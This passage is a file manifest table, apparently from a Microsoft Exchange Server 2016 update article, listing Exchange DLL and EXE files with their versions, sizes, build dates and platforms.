15.1.2242.5| 15,752| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2242.8| 36,744| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2242.5| 15,752| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2242.5| 79,768| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2242.8| 396,184| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2242.5| 21,376| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2242.8| 57,216| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2242.8| 14,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2242.8| 35,720| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2242.5| 276,368| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2242.5| 16,280| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2242.8| 25,992| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2242.5| 13,696| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2242.8| 23,432| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2242.8| 377,216| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2242.5| 83,832| 04-Apr-2021| 09:14| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2242.8| 2,970,520| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2242.8| 5,028,744| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2242.5| 894,360| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2242.8| 413,584| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2242.5| 924,536| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2242.8| 31,616| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2242.5| 52,104| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2242.5| 21,912| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2242.8| 33,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2242.8| 3,478,400| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2242.5| 108,424| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2242.8| 288,640| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2242.5| 621,952| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2242.5| 86,424| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2242.5| 1,827,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2242.5| 31,616| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2242.5| 466,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2242.8| 25,984| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2242.5| 38,296| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2242.5| 102,808| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2242.5| 48,528| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2242.5| 67,472| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.dll| 15.1.2242.5| 172,952| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2242.5| 113,536| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2242.5| 13,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2242.5| 130,456| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2242.5| 63,880| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2242.5| 19,848| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2242.5| 15,256| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2242.5| 107,928| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2242.5| 51,600| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2242.5| 36,760| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2242.5| 27,512| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2242.5| 1,042,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2242.5| 29,064| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2242.5| 13,184| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2242.8| 181,120| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2242.5| 30,096| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2242.5| 22,408| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2242.5| 85,912| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2242.5| 41,352| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2242.5| 37,256| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2242.8| 50,552| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2242.8| 33,144| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2242.8| 1,100,152| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2242.8| 206,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2242.8| 210,816| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.compression.dll| 15.1.2242.5| 17,288| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2242.5| 37,760| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2242.5| 14,216| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2242.5| 145,792| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2242.5| 14,208| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2242.5| 53,144| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2242.5| 15,768| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2242.5| 23,440| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2242.5| 13,176| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2242.5| 54,648| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2242.5| 13,696| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2242.8| 1,845,136| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2242.5| 30,104| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2242.5| 68,504| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2242.5| 15,240| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2242.5| 21,376| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2242.5| 13,176| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2242.5| 26,008| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2242.5| 169,864| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2242.5| 330,128| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2242.5| 173,976| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2242.5| 71,064| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2242.5| 203,672| 04-Apr-2021| 09:14| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2242.5| 27,016| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2242.5| 51,608| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2242.5| 51,080| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2242.5| 46,984| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2242.5| 1,092,504| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2242.5| 57,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2242.5| 326,552| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2242.5| 3,353,984| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2242.5| 35,720| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2242.5| 165,256| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2242.5| 619,392| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2242.5| 7,782,280| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2242.5| 80,280| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.data.dll| 15.1.2242.5| 1,786,752| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2242.8| 1,626,504| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2242.5| 362,368| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2242.5| 105,880| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2242.5| 15,744| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2242.5| 224,640| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2242.5| 186,752| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2242.5| 39,816| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2242.5| 119,168| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2242.5| 968,072| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2242.5| 141,184| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2242.5| 769,424| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2242.5| 139,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.2242.5| 56,704| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2242.5| 452,992| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2242.5| 32,648| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2242.5| 256,392| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2242.5| 11,641,240| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2242.5| 37,784| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2242.5| 655,752| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2242.5| 174,456| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2242.5| 36,216| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2242.5| 14,208| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2242.5| 14,216| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2242.5| 14,720| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2242.8| 72,592| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2242.5| 13,184| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2242.5| 22,928| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2242.5| 2,210,696| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2242.5| 2,210,696| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2242.5| 23,944| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2242.5| 546,688| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2242.5| 215,424| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2242.5| 193,416| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2242.5| 146,304| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2242.5| 27,528| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2242.5| 13,688| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2242.8| 49,544| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2242.5| 28,040| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2242.5| 208,768| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2242.5| 88,968| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2242.5| 32,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2242.8| 45,976| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2242.8| 18,824| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2242.5| 473,472| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2242.5| 206,216| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2242.8| 36,736| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2242.5| 131,480| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2242.5| 21,896| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2242.5| 148,360| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2242.5| 220,056| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2242.5| 23,928| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2242.5| 97,688| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2242.5| 1,266,048| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2242.5| 1,266,048| 04-Apr-2021| 09:12| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,491| 04-Apr-2021| 09:12| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2242.5| 87,424| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,465| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2242.5| 52,104| 04-Apr-2021| 09:13| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2242.8| 294,272| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2242.8| 73,112| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2242.5| 45,952| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2242.8| 218,520| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2242.5| 78,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2242.5| 35,736| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2242.8| 932,240| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2242.5| 336,248| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2242.5| 52,632| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2242.5| 32,128| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2242.5| 60,800| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2242.5| 854,408| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2242.8| 291,736| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2242.5| 39,288| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2242.8| 76,184| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2242.8| 166,784| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2242.8| 1,486,728| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2242.8| 122,248| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2242.8| 12,327,304| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2242.5| 264,080| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2242.5| 37,760| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2242.8| 186,760| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2242.8| 64,408| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2242.8| 83,856| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2242.5| 63,880| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2242.5| 100,224| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2242.5| 144,776| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2242.8| 270,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2242.5| 15,240| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2242.5| 15,744| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2242.5| 130,440| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2242.5| 254,344| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2242.5| 13,192| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2242.8| 37,256| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2242.5| 640,896| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2242.5| 37,272| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2242.8| 146,312| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2242.5| 13,192| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2242.8| 593,816| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2242.5| 14,720| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2242.8| 30,072| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2242.5| 99,736| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2242.5| 42,392| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2242.8| 40,320| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2242.8| 54,152| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2242.5| 163,704| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2242.8| 58,760| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2242.5| 204,160| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2242.8| 30,600| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2242.8| 38,792| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2242.8| 48,512| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2242.5| 180,616| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2242.8| 36,760| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2242.8| 26,008| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2242.8| 1,868,160| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2242.5| 54,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2242.8| 35,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2242.5| 35,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2242.5| 18,304| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2242.5| 18,304| 04-Apr-2021| 09:13| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2242.5| 263,064| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2242.5| 263,064| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2242.5| 24,952| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2242.5| 24,952| 04-Apr-2021| 09:12| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2242.5| 53,144| 04-Apr-2021| 09:12| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2242.5| 216,952| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2242.8| 32,136| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2242.8| 281,984| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2242.5| 18,816| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2242.8| 83,864| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2242.5| 15,240| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2242.5| 94,104| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2242.8| 1,840,512| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2242.5| 71,552| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2242.8| 175,512| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2242.5| 45,960| 04-Apr-2021| 09:15| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2242.5| 159,616| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2242.5| 51,080| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2242.5| 45,944| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2242.5| 30,616| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2242.5| 100,232| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2242.5| 13,208| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2242.8| 271,232| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2242.5| 22,408| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2242.5| 33,688| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2242.5| 18,328| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2242.5| 15,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2242.5| 27,544| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2242.5| 30,592| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2242.5| 22,416| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2242.5| 66,440| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2242.5| 29,592| 04-Apr-2021| 09:11| x86 